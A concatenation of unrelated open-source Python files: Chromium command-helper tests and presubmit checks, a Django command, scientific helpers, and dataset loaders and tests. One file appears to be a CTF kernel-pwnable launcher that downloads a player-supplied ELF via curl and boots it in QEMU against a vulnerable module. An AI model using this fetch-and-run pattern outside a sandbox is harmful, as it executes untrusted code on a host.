cmd = 'TEST_VAR=world; echo %s' % cmd_helper.DoubleQuote(test_string)
self.assertEquals('hello world',
cmd_helper.GetCmdOutput(cmd, shell=True).rstrip())
class CmdHelperShinkToSnippetTest(unittest.TestCase):
def testShrinkToSnippet_noArgs(self):
self.assertEquals('foo',
cmd_helper.ShrinkToSnippet(['foo'], 'a', 'bar'))
self.assertEquals("'foo foo'",
cmd_helper.ShrinkToSnippet(['foo foo'], 'a', 'bar'))
self.assertEquals('"$a"\' bar\'',
cmd_helper.ShrinkToSnippet(['foo bar'], 'a', 'foo'))
self.assertEquals('\'foo \'"$a"',
cmd_helper.ShrinkToSnippet(['foo bar'], 'a', 'bar'))
self.assertEquals('foo"$a"',
cmd_helper.ShrinkToSnippet(['foobar'], 'a', 'bar'))
def testShrinkToSnippet_singleArg(self):
self.assertEquals("foo ''",
cmd_helper.ShrinkToSnippet(['foo', ''], 'a', 'bar'))
self.assertEquals("foo foo",
cmd_helper.ShrinkToSnippet(['foo', 'foo'], 'a', 'bar'))
self.assertEquals('"$a" "$a"',
cmd_helper.ShrinkToSnippet(['foo', 'foo'], 'a', 'foo'))
self.assertEquals('foo "$a""$a"',
cmd_helper.ShrinkToSnippet(['foo', 'barbar'], 'a', 'bar'))
self.assertEquals('foo "$a"\' \'"$a"',
cmd_helper.ShrinkToSnippet(['foo', 'bar bar'], 'a', 'bar'))
self.assertEquals('foo "$a""$a"\' \'',
cmd_helper.ShrinkToSnippet(['foo', 'barbar '], 'a', 'bar'))
self.assertEquals('foo \' \'"$a""$a"\' \'',
cmd_helper.ShrinkToSnippet(['foo', ' barbar '], 'a', 'bar'))
_DEFAULT = 'DEFAULT'
class _ProcessOutputEvent(object):
def __init__(self, select_fds=_DEFAULT, read_contents=None, ts=_DEFAULT):
self.select_fds = select_fds
self.read_contents = read_contents
self.ts = ts
class _MockProcess(object):
def __init__(self, output_sequence=None, return_value=0):
# Arbitrary.
fake_stdout_fileno = 25
self.mock_proc = mock.MagicMock(spec=subprocess.Popen)
self.mock_proc.stdout = mock.MagicMock()
self.mock_proc.stdout.fileno = mock.MagicMock(
return_value=fake_stdout_fileno)
self.mock_proc.returncode = None
self._return_value = return_value
# This links the behavior of os.read, select.select, time.time, and
# <process>.poll. The output sequence can be thought of as a list of
# return values for select.select with corresponding return values for
# the other calls at any time between that select call and the following
# one. We iterate through the sequence only on calls to select.select.
#
# os.read is a special case, though, where we only return a given chunk
# of data *once* after a given call to select.
if not output_sequence:
output_sequence = []
    # Use a leading element to make the iteration logic work.
initial_seq_element = _ProcessOutputEvent(
_DEFAULT, '',
output_sequence[0].ts if output_sequence else _DEFAULT)
output_sequence.insert(0, initial_seq_element)
for o in output_sequence:
if o.select_fds == _DEFAULT:
if o.read_contents is None:
o.select_fds = []
else:
o.select_fds = [fake_stdout_fileno]
if o.ts == _DEFAULT:
o.ts = time.time()
self._output_sequence = output_sequence
self._output_seq_index = 0
self._read_flags = [False] * len(output_sequence)
def read_side_effect(*_args, **_kwargs):
if self._read_flags[self._output_seq_index]:
return None
self._read_flags[self._output_seq_index] = True
return self._output_sequence[self._output_seq_index].read_contents
def select_side_effect(*_args, **_kwargs):
if self._output_seq_index is None:
self._output_seq_index = 0
else:
self._output_seq_index += 1
if self._output_seq_index < len(self._output_sequence):
return (self._output_sequence[self._output_seq_index].select_fds,
None, None)
else:
return([], None, None)
def time_side_effect(*_args, **_kwargs):
return self._output_sequence[self._output_seq_index].ts
def poll_side_effect(*_args, **_kwargs):
if self._output_seq_index >= len(self._output_sequence) - 1:
self.mock_proc.returncode = self._return_value
return self.mock_proc.returncode
mock_read = mock.MagicMock(side_effect=read_side_effect)
mock_select = mock.MagicMock(side_effect=select_side_effect)
mock_time = mock.MagicMock(side_effect=time_side_effect)
self.mock_proc.poll = mock.MagicMock(side_effect=poll_side_effect)
# Set up but *do not start* the mocks.
self._mocks = [
mock.patch('os.read', new=mock_read),
mock.patch('select.select', new=mock_select),
mock.patch('time.time', new=mock_time),
]
if sys.platform != 'win32':
self._mocks.append(mock.patch('fcntl.fcntl'))
def __enter__(self):
for m in self._mocks:
m.__enter__()
return self.mock_proc
def __exit__(self, exc_type, exc_val, exc_tb):
for m in reversed(self._mocks):
m.__exit__(exc_type, exc_val, exc_tb)
class CmdHelperIterCmdOutputLinesTest(unittest.TestCase):
"""Test IterCmdOutputLines with some calls to the unix 'seq' command."""
# This calls _IterCmdOutputLines rather than IterCmdOutputLines s.t. it
# can mock the process.
# pylint: disable=protected-access
_SIMPLE_OUTPUT_SEQUENCE = [
_ProcessOutputEvent(read_contents='1\n2\n'),
]
def testIterCmdOutputLines_success(self):
with _MockProcess(
output_sequence=self._SIMPLE_OUTPUT_SEQUENCE) as mock_proc:
for num, line in enumerate(
cmd_helper._IterCmdOutputLines(mock_proc, 'mock_proc'), 1):
self.assertEquals(num, int(line))
def testIterCmdOutputLines_exitStatusFail(self):
with self.assertRaises(subprocess.CalledProcessError):
with _MockProcess(output_sequence=self._SIMPLE_OUTPUT_SEQUENCE,
return_value=1) as mock_proc:
for num, line in enumerate(
cmd_helper._IterCmdOutputLines(mock_proc, 'mock_proc'), 1):
self.assertEquals(num, int(line))
# after reading all the output we get an exit status of 1
def testIterCmdOutputLines_exitStatusIgnored(self):
with _MockProcess(output_sequence=self._SIMPLE_OUTPUT_SEQUENCE,
return_value=1) as mock_proc:
for num, line in enumerate(
cmd_helper._IterCmdOutputLines(
mock_proc, 'mock_proc', check_status=False),
1):
self.assertEquals(num, int(line))
def testIterCmdOutputLines_exitStatusSkipped(self):
with _MockProcess(output_sequence=self._SIMPLE_OUTPUT_SEQUENCE,
return_value=1) as mock_proc:
for num, line in enumerate(
cmd_helper._IterCmdOutputLines(mock_proc, 'mock_proc'), 1):
self.assertEquals(num, int(line))
# no exception will be raised because we don't attempt to read past
# the end of the output and, thus, the status never gets checked
if num == 2:
break
def testIterCmdOutputLines_delay(self):
output_sequence = [
_ProcessOutputEvent(read_contents='1\n2\n', ts=1),
_ProcessOutputEvent(read_contents=None, ts=2),
_ProcessOutputEvent(read_contents='Awake', ts=10),
]
with _MockProcess(output_sequence=output_sequence) as mock_proc:
for num, line in enumerate(
cmd_helper._IterCmdOutputLines(mock_proc, 'mock_proc',
iter_timeout=5), 1):
if num <= 2:
self.assertEquals(num, int(line))
elif num == 3:
self.assertEquals(None, line)
elif num == 4:
self.assertEquals('Awake', line)
else:
self.fail()
if __name__ == '__main__':
unittest.main()
|
spaghetti/tests/test_api_network.py
|
gegen07/spaghetti
| 182 |
65183
|
<filename>spaghetti/tests/test_api_network.py<gh_stars>100-1000
""" Testing for the spaghetti api import structure.
"""
import unittest
from .network_unittest_classes import TestNetwork
from .network_unittest_classes import TestNetworkPointPattern
from .network_unittest_classes import TestNetworkAnalysis
# api import structure
import spaghetti
# run tests on spaghetti.network.Network
TestNetwork.spaghetti = spaghetti
TestNetwork()
# run tests on spaghetti.network.PointPattern
TestNetworkPointPattern.spaghetti = spaghetti
TestNetworkPointPattern()
# run tests on spaghetti.analysis
TestNetworkAnalysis.spaghetti = spaghetti
TestNetworkAnalysis()
if __name__ == "__main__":
unittest.main()
|
lib/django-1.4/django/core/management/commands/sqlcustom.py
|
MiCHiLU/google_appengine_sdk
| 790 |
65185
|
from optparse import make_option
from django.core.management.base import AppCommand
from django.core.management.sql import sql_custom
from django.db import connections, DEFAULT_DB_ALIAS
class Command(AppCommand):
help = "Prints the custom table modifying SQL statements for the given app name(s)."
option_list = AppCommand.option_list + (
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a database to print the '
'SQL for. Defaults to the "default" database.'),
)
output_transaction = True
def handle_app(self, app, **options):
return u'\n'.join(sql_custom(app, self.style, connections[options.get('database')])).encode('utf-8')
|
examples/pytorch/text_classification/data/trec/data_preparation.py
|
cminusQAQ/graph4nlp
| 1,269 |
65195
|
<reponame>cminusQAQ/graph4nlp<gh_stars>1000+
import sys
import chardet
fin = open(sys.argv[1], "rb")
fout = open(sys.argv[2], "w")
for line in fin:
try:
line = line.decode("utf-8")
except Exception:
line = line.decode(chardet.detect(line)["encoding"])
data = line.strip().split()
text = " ".join(data[1:])
label = data[0].split(":")[0]
fout.write("{}\t{}\n".format(text, label))
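# Usage sketch (file names are hypothetical examples, not from the repository):
#
#     python data_preparation.py raw_trec_train.label trec_train.tsv
#
# Each output line has the form "<question text>\t<coarse label>".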
|
cesium/features/common_functions.py
|
acrellin/cesium
| 603 |
65211
|
<filename>cesium/features/common_functions.py<gh_stars>100-1000
import numpy as np
from scipy import stats
def max_slope(t, x):
"""Compute the largest rate of change in the observed data."""
slopes = np.diff(x) / np.diff(t)
return np.max(np.abs(slopes))
def maximum(x):
"""Maximum observed value."""
return np.max(x)
def median(x):
"""Median of observed values."""
return np.median(x)
def median_absolute_deviation(x):
"""Median absolute deviation (from the median) of the observed values."""
return np.median(np.abs(x - np.median(x)))
def minimum(x):
"""Minimum observed value."""
return np.min(x)
def percent_beyond_1_std(x, e):
"""Percentage of values more than 1 std. dev. from the weighted average."""
dists_from_mu = x - weighted_average(x, e)
return np.mean(np.abs(dists_from_mu) > weighted_std_dev(x, e))
def percent_close_to_median(x, window_frac=0.1):
"""Percentage of values within window_frac*(max(x)-min(x)) of median."""
window = (x.max() - x.min()) * window_frac
return np.mean(np.abs(x - np.median(x)) < window)
def skew(x):
"""Skewness of a dataset. Approximately 0 for Gaussian data."""
return stats.skew(x)
def std(x):
"""Standard deviation of observed values."""
return np.std(x)
def weighted_average(x, e):
"""Arithmetic mean of observed values, weighted by measurement errors."""
return np.average(x, weights=1. / (e**2))
def weighted_average_std_err(x, e):
"""
Standard deviation of the sample weighted average of values x with
measurement errors e.
Note: this is not the same as the weighted sample standard deviation;
this value only quantifies the measurement errors, not the dispersion of
the data.
"""
return np.sqrt(1.0 / np.sum(e**2))
def weighted_std_dev(x, e):
"""Standard deviation of observed values, weighted by measurement errors."""
return np.sqrt(np.average((x - weighted_average(x, e))**2,
weights=1. / (e**2)))
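# A small worked example (assumed inputs, not part of the library's tests):
#
#     >>> x = np.array([1.0, 2.0, 3.0])
#     >>> e = np.array([0.1, 0.1, 0.1])
#     >>> weighted_average(x, e)   # equal errors reduce to the plain mean
#     2.0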
|
infra/config/PRESUBMIT.py
|
chromium/chromium
| 14,668 |
65214
|
<filename>infra/config/PRESUBMIT.py
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enforces luci-milo.cfg consistency.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details on the presubmit API built into depot_tools.
"""
PRESUBMIT_VERSION = '2.0.0'
USE_PYTHON3 = True
_IGNORE_FREEZE_FOOTER = 'Ignore-Freeze'
# The time module's handling of timezones is abysmal, so the boundaries are
# precomputed in UNIX time
_FREEZE_START = 1639641600 # 2021/12/16 00:00 -0800
_FREEZE_END = 1641196800 # 2022/01/03 00:00 -0800
def CheckFreeze(input_api, output_api):
if _FREEZE_START <= input_api.time.time() < _FREEZE_END:
footers = input_api.change.GitFootersFromDescription()
if _IGNORE_FREEZE_FOOTER not in footers:
def convert(t):
ts = input_api.time.localtime(t)
return input_api.time.strftime('%Y/%m/%d %H:%M %z', ts)
return [
output_api.PresubmitError(
'There is a prod freeze in effect from {} until {},'
' files in //infra/config cannot be modified'.format(
convert(_FREEZE_START), convert(_FREEZE_END)))
]
return []
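# For illustration: during the freeze window a CL can still land by carrying a
# git footer of the form "Ignore-Freeze: <reason>" in its description, since
# CheckFreeze only errors when that footer is absent.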
def CheckTests(input_api, output_api):
glob = input_api.os_path.join(input_api.PresubmitLocalPath(), '*_test.py')
tests = input_api.canned_checks.GetUnitTests(input_api,
output_api,
input_api.glob(glob),
run_on_python2=False,
run_on_python3=True,
skip_shebang_check=True)
return input_api.RunTests(tests)
def CheckLintLuciMilo(input_api, output_api):
if ('infra/config/generated/luci/luci-milo.cfg' in input_api.LocalPaths()
or 'infra/config/lint-luci-milo.py' in input_api.LocalPaths()):
return input_api.RunTests([
input_api.Command(
name='lint-luci-milo',
cmd=[input_api.python_executable, 'lint-luci-milo.py'],
kwargs={},
message=output_api.PresubmitError),
])
return []
def CheckTestingBuildbot(input_api, output_api):
if ('infra/config/generated/luci/luci-milo.cfg' in input_api.LocalPaths() or
'infra/config/generated/luci/luci-milo-dev.cfg' in input_api.LocalPaths()
):
return input_api.RunTests([
input_api.Command(
name='testing/buildbot config checks',
cmd=[input_api.python_executable, input_api.os_path.join(
'..', '..', 'testing', 'buildbot',
'generate_buildbot_json.py',),
'--check'],
kwargs={},
message=output_api.PresubmitError),
])
return []
def CheckLucicfgGenOutputMain(input_api, output_api):
return input_api.RunTests(input_api.canned_checks.CheckLucicfgGenOutput(
input_api, output_api, 'main.star'))
def CheckLucicfgGenOutputDev(input_api, output_api):
return input_api.RunTests(input_api.canned_checks.CheckLucicfgGenOutput(
input_api, output_api, 'dev.star'))
def CheckChangedLUCIConfigs(input_api, output_api):
return input_api.canned_checks.CheckChangedLUCIConfigs(
input_api, output_api)
# Footer indicating a CL that is trying to address an outage by some mechanism
# other than those in infra/config/outages
_OUTAGE_ACTION_FOOTER = 'Infra-Config-Outage-Action'
# Footer acknowledging that an outages configuration is in effect when making an
# unrelated change
_IGNORE_OUTAGE_FOOTER = 'Infra-Config-Ignore-Outage'
def CheckOutagesConfigOnCommit(input_api, output_api):
outages_pyl = input_api.os_path.join(
input_api.PresubmitLocalPath(), 'generated/outages.pyl')
with open(outages_pyl) as f:
outages_config = input_api.ast.literal_eval(f.read())
if not outages_config:
footers = input_api.change.GitFootersFromDescription()
return [
output_api.PresubmitError(
'There is no outages configuration in effect, '
'please remove the {} footer from your CL description.'
.format(footer))
for footer in (_OUTAGE_ACTION_FOOTER, _IGNORE_OUTAGE_FOOTER)
if footer in footers
]
# Any of the config files under infra/config/outages
outages_config_files = set()
# Any of the config files under infra/config/generated
generated_config_files = set()
# Any config files that are not under infra/config/outages or
# infra/config/generated
config_files = set()
for p in input_api.LocalPaths():
if p in ('README.md', 'OWNERS'):
continue
if p.startswith('infra/config/outages/'):
outages_config_files.add(p)
continue
if p.startswith('infra/config/generated/'):
generated_config_files.add(p)
continue
config_files.add(p)
  # If the only changes to non-generated config files were the outages files,
# assume the change was addressing an outage and that no additional mechanism
# needs to be added
if outages_config_files and not config_files:
# REVIEWER: Should we prevent the footers from being here in this case?
return []
# If any non-generated, non-outages files were modified or if the generated
# config files were modified without any config files being modified (lucicfg
# change, etc.) then make sure the user knows that when the outages
# configuration is disabled, the generated configuration may change
if config_files or generated_config_files:
footers = input_api.change.GitFootersFromDescription()
has_action_footer = _OUTAGE_ACTION_FOOTER in footers
has_ignore_footer = _IGNORE_OUTAGE_FOOTER in footers
if has_action_footer and has_ignore_footer:
return [
output_api.PresubmitError(
'Only one of {} or {} should be present in your CL description'
.format(_OUTAGE_ACTION_FOOTER, _IGNORE_OUTAGE_FOOTER)),
]
if not has_action_footer and not has_ignore_footer:
outages_config_lines = ['{}: {}'.format(k, v)
for k, v in sorted(outages_config.items())]
return [
output_api.PresubmitError('\n'.join([
'The following outages configuration is in effect:\n {}'.format(
'\n '.join(outages_config_lines)),
('The effect of your change may not be visible '
'in the generated configuration.'),
('If your change is addressing the outage, '
'please add the footer {} with a link for the outage.'
).format(_OUTAGE_ACTION_FOOTER),
('If your change is not addressing the outage '
'but you still wish to land it, please add the footer '
'{} with a reason.').format(_IGNORE_OUTAGE_FOOTER),
('For more information on outages configuration, '
'see https://chromium.googlesource.com/chromium/src/+/HEAD/infra/config/outages'
),
])),
]
return []
|
sfepy/homogenization/coefficients.py
|
BubuLK/sfepy
| 510 |
65232
|
<reponame>BubuLK/sfepy
from __future__ import absolute_import
import numpy as nm
from sfepy.base.base import ordered_iteritems, Struct, basestr
from sfepy.base.ioutils import read_dict_hdf5, write_dict_hdf5
from sfepy.homogenization.utils import iter_sym
import six
from six.moves import range
def coef_arrays_to_dicts(idict, format='%s/%d'):
out = {}
for k, v in six.iteritems(idict):
if isinstance(v, list):
out.update({format %(k, ii): vv for ii, vv in enumerate(v)})
else:
out[k] = v
return out
class Coefficients(Struct):
"""
Class for storing (homogenized) material coefficients.
"""
def from_file_hdf5( filename ):
obj = Coefficients()
obj.__dict__ = read_dict_hdf5( filename )
for key, val in six.iteritems(obj.__dict__):
if type( val ) == list:
for ii, vv in enumerate( val ):
val[ii] = nm.array( vv, dtype = nm.float64 )
return obj
from_file_hdf5 = staticmethod( from_file_hdf5 )
def to_file_hdf5( self, filename ):
write_dict_hdf5( filename, self.__dict__ )
def _escape_latex(self, txt):
        return txt.replace('_', r'\_').replace('%', r'\%')
def _format(self, val):
out = self._a_format % val
if self._a_cdot:
a1, a2 = out.split('e')
if (self._a_filter is not None) and (int(a2) < self._a_filter):
out = '0'
else:
                out = r'%s \cdot 10^{%s}' % (a1, int(a2))
return out
def _write1d(self, fd, val):
fd.write( r' \begin{equation}' )
fd.write( '\n' )
fd.write( r' \left[' )
fd.write( '\n' )
fd.write(', '.join([self._format(vv) for vv in val]))
fd.write( '\n' )
fd.write( r' \right]' )
fd.write( '\n' )
fd.write( r' \end{equation}' )
fd.write( '\n' )
def _write2d(self, fd, val):
fd.write( r' \begin{equation}' )
fd.write( '\n' )
fd.write( r' \left[\begin{array}{%s}' % ('c' * val.shape[0]) )
fd.write( '\n' )
for ir in range( val.shape[1] ):
for ic in range( val.shape[0] ):
fd.write(' ' + self._format(val[ir,ic]))
if ic < (val.shape[0] - 1):
fd.write( r' & ' )
elif ir < (val.shape[1] - 1):
fd.write( r' \\' )
fd.write( '\n' )
fd.write( '\n' )
fd.write( r' \end{array}\right]' )
fd.write( '\n' )
fd.write( r' \end{equation}' )
fd.write( '\n' )
def _save_dict_latex(self, adict, fd, names, idx=None):
fd.write( r'\begin{itemize}' )
fd.write( '\n' )
for key, val in ordered_iteritems(adict):
if key.startswith('_a_'): continue
try:
lname = names[key]
except:
lname = self._escape_latex(key)
fd.write( '\item %s:' % lname )
fd.write( '\n' )
if isinstance(val, list):
if idx is not None:
val = val[idx]
else:
raise NotImplementedError("'idx' must be set in the case "
"of multi-coefficients!")
if isinstance(val, dict):
self._save_dict_latex(val, fd, names)
elif isinstance(val, basestr):
fd.write(self._escape_latex(val) + '\n')
elif isinstance(val, float):
fd.write('$' + self._format(val) + '$\n')
elif isinstance(val, nm.ndarray):
if val.ndim == 0:
fd.write('$' + self._format(val) + '$\n')
elif val.ndim == 1:
self._write1d(fd, val)
elif val.ndim == 2:
self._write2d(fd, val)
else:
fd.write('%s' % val)
fd.write( r'\end{itemize}' )
fd.write( '\n\n' )
def to_file_latex(self, filename, names, format='%.2e',
cdot=False, filter=None, idx=None):
r"""
Save the coefficients to a file in LaTeX format.
Parameters
----------
filename : str
The name of the output file.
names : dict
Mapping of attribute names to LaTeX names.
format : str
Format string for numbers.
cdot : bool
For '%.e' formats only. If True, replace 'e' by LaTeX '\cdot
10^{exponent}' format.
filter : int
For '%.e' formats only. Typeset as 0, if exponent is less than
`filter`.
idx : int
For multi-coefficients, set the coefficient index.
"""
self._a_format = format
self._a_cdot = cdot
self._a_filter = filter
fd = open(filename, 'w')
self._save_dict_latex(self.__dict__, fd, names, idx)
fd.close()
def _save_dict(self, adict, fd, names, format):
toremove = []
adict_complex = {}
for key, val in ordered_iteritems(adict):
if hasattr(val, 'dtype') and \
nm.issubdtype(val.dtype, nm.complexfloating):
adict_complex[key + '_real'] = val.real
adict_complex[key + '_imag'] = val.imag
toremove.append(key)
for key in toremove:
del(adict[key])
adict.update(adict_complex)
for key, val in ordered_iteritems(adict):
try:
lname = names[key]
except:
lname = key
fd.write('%s:\n' % lname)
if hasattr(val, 'to_file_txt'):
if val.to_file_txt is not None:
val.to_file_txt(fd, format, val)
else:
fd.write('--\n')
elif isinstance(val, dict):
self._save_dict(val, fd, names, format)
fd.write('\n')
elif isinstance(val, list):
if isinstance(val[0], basestr):
fd.write('\n'.join(val) + '\n')
elif isinstance(val, basestr):
fd.write(val + '\n')
elif isinstance(val, float):
fd.write('%e\n' % val)
elif isinstance(val, nm.ndarray):
if val.ndim == 0:
fd.write(format % val)
fd.write('\n')
elif val.ndim == 1:
for ic in range(val.shape[0]):
fd.write(format % val[ic])
if ic < (val.shape[0] - 1):
fd.write(', ')
else:
fd.write('\n')
elif val.ndim == 2:
for ir in range(val.shape[0]):
for ic in range(val.shape[1]):
fd.write(format % val[ir,ic])
if ic < (val.shape[1] - 1):
fd.write(', ')
elif ir < (val.shape[0] - 1):
fd.write(';\n')
fd.write('\n')
elif val.ndim == 3:
for ii in range(val.shape[0]):
fd.write(' step %d:\n' % ii)
for ir in range(val.shape[1]):
for ic in range(val.shape[2]):
fd.write(' ' + format % val[ii,ir,ic])
if ic < (val.shape[2] - 1):
fd.write(', ')
elif ir < (val.shape[1] - 1):
fd.write(';\n')
fd.write('\n')
fd.write('\n')
else:
fd.write('--\n')
fd.write('\n')
def to_file_txt( self, filename, names, format ):
fd = open( filename, 'w' )
self._save_dict(coef_arrays_to_dicts(self.__dict__), fd, names, format)
fd.close()
_table_vector = r"""
\begin{center}
\begin{tabular}{cc}
i & value \\
%s
\end{tabular}
\end{center}
"""
_table_matrix_1 = r"""
\begin{center}
\begin{tabular}{cc}
ij & value \\
%s
\end{tabular}
\end{center}
"""
_table_matrix_2 = r"""
\begin{center}
\begin{tabular}{cc}
ijkl & value \\
%s
\end{tabular}
\end{center}
"""
_itemize = r"""
\begin{itemize}
%s
\end{itemize}
"""
##
# c: 09.07.2008, r: 09.07.2008
def _typeset( self, val, dim, style = 'table', format = '%f',
step = None ):
sym = (dim + 1) * dim // 2
mode = None
if val.ndim == 0:
mode = 'scalar'
elif val.ndim == 1:
if val.shape[0] == 1:
mode = 'scalar'
elif val.shape[0] == dim:
mode = 'vector'
elif val.shape[0] == sym:
mode = 'matrix_t1d'
elif val.ndim == 2:
if val.shape[0] == dim:
mode = 'matrix_2D'
elif val.shape[0] == sym:
mode = 'matrix_t2d'
out = ''
if mode == 'scalar':
out = format % val
elif mode == 'vector':
aux = ' \\\\\n'.join( [r'$_%d$ & %s' % (ir + 1, format % val[ir])
for ir in range( dim )] )
out = self._table_vector % aux
elif mode == 'matrix_t1d':
aux = ' \\\\\n'.join( [r'$_{%d%d}$ & %s' % (ir + 1, ic + 1,
format % val[ii])
for ii, (ir, ic) \
in enumerate( iter_sym( dim ) )] )
out = self._table_matrix_1 % aux
elif mode == 'matrix_2D':
aux = ' \\\\\n'.join( [r'$_{%d%d}$ & %s' % (ir + 1, ic + 1,
format % val[ir,ic])
for ir in range( dim )
for ic in range( dim )] )
out = self._table_matrix_1 % aux
elif mode == 'matrix_t2d':
aux = ' \\\\\n'.join( [r'$_{%d%d%d%d}$ & %s' % (irr + 1, irc + 1,
icr + 1, icc + 1,
format % val[ii,jj])
for ii, (irr, irc) \
in enumerate( iter_sym( dim ) )
for jj, (icr, icc) \
in enumerate( iter_sym( dim ) )] )
out = self._table_matrix_2 % aux
return out
def to_latex( self, attr_name, dim, style = 'table', format = '%f',
step = None ):
val = getattr( self, attr_name )
if step is not None:
val = val[step]
if isinstance( val, dict ):
aux = ''
for key, dval in six.iteritems(val):
aux2 = r'\item %s : %s' % (key,
self._typeset( dval, dim, style,
format, step ))
aux = '\n'.join( (aux, aux2) )
out = self._itemize % aux
else:
out = self._typeset( val, dim, style, format, step )
return out
|
pwnables/kpets/challenge.py
|
cclauss/fbctf-2019-challenges
| 213 |
65253
|
#!/usr/bin/python

import struct
import os
import sys
import tempfile
import subprocess

useragent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'


def main():
    # Gate on ./pow.py (proof-of-work check) before starting the VM.
    try:
        p = subprocess.Popen('./pow.py ask 3'.split())
        p.communicate()
        if p.returncode != 2:
            exit(1)
    except:
        exit(1)

    print('Would you like to add a file to the VM? This isn\'t part of the challenge (Y/n)')
    choice = raw_input()
    if choice.strip() != 'n':
        print('File URL (max size 1MB): ')
        url = raw_input().strip()
        tmp_file = tempfile.mktemp()

        # Do some basic validation of the URL
        if not (url.startswith('http://') or url.startswith('https://')) \
                or 'localhost' in url \
                or '::1' in url \
                or '127.0.0.1' in url:
            print('Invalid URL')
            exit(1)

        # Fetch the file
        p = subprocess.Popen(['curl', '-A', useragent, '--max-filesize', '1048576', '-o', tmp_file, url]) # max 1MB
        p.communicate()
        if p.returncode != 0:
            print('exited with code {}'.format(p.returncode))
            exit(1)

        # Validate magic of the downloaded file
        with open(tmp_file) as f:
            if f.read(4) != '\x7fELF':
                #print('ELF files only')
                exit(1)

        # Make copy of initramfs and insert exploit file
        new_ramfs = tempfile.mkdtemp()
        #print('New initramfs: {}'.format(new_ramfs))
        os.system('cp -r base_qemu/initramfs/ {}'.format(new_ramfs))
        out_file = '{}/initramfs/bin/exploit'.format(new_ramfs)
        #print('Moving {} to {}'.format(tmp_file, out_file))
        os.system('mv {} {}'.format(tmp_file, out_file))
        print('Your binary is at /bin/exploit')

        # Pack new initramfs
        os.system('./pack_initramfs.sh {}/initramfs/ src/kpets.ko'.format(new_ramfs))
        os.system('./start_qemu.sh qemu/bzImage {}/initramfs.cpio'.format(new_ramfs))
        os.system('rm -r {}'.format(new_ramfs))
    else:
        # Use standard initramfs
        os.system('./start_qemu.sh qemu/bzImage qemu/initramfs.cpio')


if __name__=="__main__":
    main()
|
tests/r/test_pension.py
|
hajime9652/observations
| 199 |
65257
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import shutil
import sys
import tempfile

from observations.r.pension import pension


def test_pension():
  """Test module pension.py by downloading
  pension.csv and testing shape of
  extracted data has 194 rows and 19 columns
  """
  test_path = tempfile.mkdtemp()
  x_train, metadata = pension(test_path)
  try:
    assert x_train.shape == (194, 19)
  except:
    shutil.rmtree(test_path)
    raise
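

# --- Added usage sketch (not part of the original test file) ---
# A minimal, hedged example of invoking the test outside of a pytest run;
# it assumes the `observations` package is installed and that network
# access is available so pension.csv can be downloaded.
if __name__ == '__main__':
  test_pension()
  print('pension shape check passed')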
|
observations/r/randu.py
|
hajime9652/observations
| 199 |
65266
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import csv
import numpy as np
import os
import sys

from observations.util import maybe_download_and_extract


def randu(path):
  """Random Numbers from Congruential Generator RANDU

  400 triples of successive random numbers were taken from the VAX FORTRAN
  function RANDU running under VMS 1.5.

  A data frame with 400 observations on 3 variables named `x`, `y` and
  `z` which give the first, second and third random number in the
  triple.

  <NAME>

  Args:

    path: str.
      Path to directory which either stores file or otherwise file will
      be downloaded and extracted there.
      Filename is `randu.csv`.

  Returns:

    Tuple of np.ndarray `x_train` with 400 rows and 3 columns and
    dictionary `metadata` of column headers (feature names).
  """
  import pandas as pd
  path = os.path.expanduser(path)
  filename = 'randu.csv'
  if not os.path.exists(os.path.join(path, filename)):
    url = 'http://dustintran.com/data/r/datasets/randu.csv'
    maybe_download_and_extract(path, url,
                               save_file_name='randu.csv',
                               resume=False)

  data = pd.read_csv(os.path.join(path, filename), index_col=0,
                     parse_dates=True)

  x_train = data.values
  metadata = {'columns': data.columns}
  return x_train, metadata
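

# --- Added usage sketch (not part of the original module) ---
# A minimal, hedged example of calling randu(); the cache directory
# '~/data' is an arbitrary choice, and the expected shapes come from the
# docstring above (400 rows, 3 columns named x, y, z).
if __name__ == '__main__':
  x_train, metadata = randu('~/data')
  print(x_train.shape)              # expected: (400, 3)
  print(list(metadata['columns']))  # expected: ['x', 'y', 'z']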
|